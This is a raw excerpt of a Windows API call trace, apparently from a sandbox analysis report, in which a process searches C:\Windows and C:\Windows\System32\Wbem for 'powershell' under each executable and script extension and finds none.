	[0438.446] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.446] SetErrorMode (uMode=0x1) returned 0x1
	[0438.447] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.447] SetErrorMode (uMode=0x1) returned 0x1
	[0438.447] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.447] SetErrorMode (uMode=0x1) returned 0x1
	[0438.447] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.447] SetErrorMode (uMode=0x1) returned 0x1
	[0438.447] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.448] SetErrorMode (uMode=0x1) returned 0x1
	[0438.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.448] SetErrorMode (uMode=0x1) returned 0x1
	[0438.448] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.448] SetErrorMode (uMode=0x1) returned 0x1
	[0438.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.448] SetErrorMode (uMode=0x1) returned 0x1
	[0438.449] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.449] SetErrorMode (uMode=0x1) returned 0x1
	[0438.449] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.449] SetErrorMode (uMode=0x1) returned 0x1
	[0438.449] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.449] SetErrorMode (uMode=0x1) returned 0x1
	[0438.450] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.450] SetErrorMode (uMode=0x1) returned 0x1
	[0438.450] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.450] SetErrorMode (uMode=0x1) returned 0x1
	[0438.450] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.450] SetErrorMode (uMode=0x1) returned 0x1
	[0438.450] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.451] SetErrorMode (uMode=0x1) returned 0x1
	[0438.451] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.451] SetErrorMode (uMode=0x1) returned 0x1
	[0438.451] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.451] SetErrorMode (uMode=0x1) returned 0x1
	[0438.451] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.451] SetErrorMode (uMode=0x1) returned 0x1
	[0438.451] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.452] SetErrorMode (uMode=0x1) returned 0x1
	[0438.452] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.452] SetErrorMode (uMode=0x1) returned 0x1
	[0438.452] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.452] SetErrorMode (uMode=0x1) returned 0x1
	[0438.452] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.453] SetErrorMode (uMode=0x1) returned 0x1
	[0438.453] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.453] SetErrorMode (uMode=0x1) returned 0x1
	[0438.453] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.453] SetErrorMode (uMode=0x1) returned 0x1
	[0438.453] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.454] SetErrorMode (uMode=0x1) returned 0x1
	[0438.454] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.454] SetErrorMode (uMode=0x1) returned 0x1
	[0438.454] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.454] SetErrorMode (uMode=0x1) returned 0x1
	[0438.454] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.455] SetErrorMode (uMode=0x1) returned 0x1
	[0438.455] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.455] SetErrorMode (uMode=0x1) returned 0x1
	[0438.455] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0438.455] SetErrorMode (uMode=0x1) returned 0x1
	[0438.455] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.456] SetErrorMode (uMode=0x1) returned 0x1
	[0438.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.456] SetErrorMode (uMode=0x1) returned 0x1
	[0438.456] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.456] SetErrorMode (uMode=0x1) returned 0x1
	[0438.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.457] SetErrorMode (uMode=0x1) returned 0x1
	[0438.457] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.457] SetErrorMode (uMode=0x1) returned 0x1
	[0438.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.457] SetErrorMode (uMode=0x1) returned 0x1
	[0438.457] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.458] SetErrorMode (uMode=0x1) returned 0x1
	[0438.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.458] SetErrorMode (uMode=0x1) returned 0x1
	[0438.458] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.458] SetErrorMode (uMode=0x1) returned 0x1
	[0438.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.459] SetErrorMode (uMode=0x1) returned 0x1
	[0438.459] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.459] SetErrorMode (uMode=0x1) returned 0x1
	[0438.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.459] SetErrorMode (uMode=0x1) returned 0x1
	[0438.459] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.459] SetErrorMode (uMode=0x1) returned 0x1
	[0438.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.460] SetErrorMode (uMode=0x1) returned 0x1
	[0438.460] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.460] SetErrorMode (uMode=0x1) returned 0x1
	[0438.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.460] SetErrorMode (uMode=0x1) returned 0x1
	[0438.460] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.461] SetErrorMode (uMode=0x1) returned 0x1
	[0438.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.461] SetErrorMode (uMode=0x1) returned 0x1
	[0438.461] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.461] SetErrorMode (uMode=0x1) returned 0x1
	[0438.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.462] SetErrorMode (uMode=0x1) returned 0x1
	[0438.462] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.462] SetErrorMode (uMode=0x1) returned 0x1
	[0438.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.462] SetErrorMode (uMode=0x1) returned 0x1
	[0438.462] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.462] SetErrorMode (uMode=0x1) returned 0x1
	[0438.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.463] SetErrorMode (uMode=0x1) returned 0x1
	[0438.463] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.463] SetErrorMode (uMode=0x1) returned 0x1
	[0438.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.463] SetErrorMode (uMode=0x1) returned 0x1
	[0438.463] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.464] SetErrorMode (uMode=0x1) returned 0x1
	[0438.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.464] SetErrorMode (uMode=0x1) returned 0x1
	[0438.464] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.464] SetErrorMode (uMode=0x1) returned 0x1
	[0438.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0438.465] SetErrorMode (uMode=0x1) returned 0x1
	[0438.465] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.465] SetErrorMode (uMode=0x1) returned 0x1
